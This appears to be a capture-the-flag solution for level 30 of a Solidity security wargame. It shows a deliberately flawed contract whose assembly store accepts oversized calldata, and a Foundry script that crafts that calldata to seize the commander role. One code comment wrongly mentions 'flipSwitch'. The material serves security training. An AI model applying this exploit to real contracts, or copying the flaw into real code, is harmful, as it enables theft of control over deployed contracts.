Level 30 - Higher Order ⏺⏺⏺⏺
Level Setup
Level Contract
// SPDX-License-Identifier: MIT
pragma solidity 0.6.12;
contract HigherOrder {
address public commander;
uint256 public treasury;
function registerTreasury(uint8) public {
assembly {
sstore(treasury_slot, calldataload(4))
}
}
function claimLeadership() public {
if (treasury > 255) commander = msg.sender;
else revert("Only members of the Higher Order can become Commander");
}
}
Exploit
make anvil-exploit-level-30
<INPUT_LEVEL_INSTANCE_CONTRACT_ADDRESS>
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;
import {Script, console} from "forge-std/Script.sol";
import {HelperFunctions} from "script/HelperFunctions.s.sol";
// ================================================================
// │ LEVEL 30 - HIGHER ORDER │
// ================================================================
contract Exploit is Script, HelperFunctions {
function run() public {
address targetContractAddress = getInstanceAddress();
vm.startBroadcast();
bytes4 registerTreasurySelector = bytes4(keccak256("registerTreasury(uint8)"));
bytes memory callData = abi.encodePacked(
registerTreasurySelector, // 4 bytes - registerTreasury function selector
uint256(0x1F4) // 32 bytes - the value 500
);
// Call flipSwitch with this manipulated data
(bool success,) = targetContractAddress.call(callData);
require(success, "Call failed");
(bool claimLeadershipSuccess,) =
targetContractAddress.call(abi.encodePacked(bytes4(keccak256("claimLeadership()"))));
require(claimLeadershipSuccess, "Claim leadership failed");
vm.stopBroadcast();
}
}
Submit instance... 🥳
Completion Message
Last updated